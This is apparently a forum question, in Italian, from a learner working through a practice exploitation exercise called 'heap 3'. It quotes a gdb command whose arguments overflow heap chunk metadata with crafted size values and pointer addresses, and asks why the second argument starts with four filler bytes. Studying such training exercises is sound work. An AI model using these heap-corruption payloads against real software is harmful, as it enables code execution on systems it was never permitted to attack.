Sto praticando la mia abilità di exploit con il seguente sito Web.
link . Ma sotto il titolo di exploit dell'heap 3, Non ho capito con quello che fa.
(gdb) r AAAA$(python -c 'print "A"*28 + "\xfc\xff\xff\xff" + "\xfc\xff\xff\xff"') $(python -c 'print "\x41"*4 + "\x1c\xb1\x04\x08" + "\x0c\xc0\x04\x08"') CCCC
Sta sfruttando i metadati dell'heap. Capisco il primo argomento che trabocca Prev_size e size of chunk B.Ma in secondo argomento, perché inizia con 'B' * 4 .Perché? Penso che dovrebbe seguire fd e bk.Si prega di spiegarmi.Grazie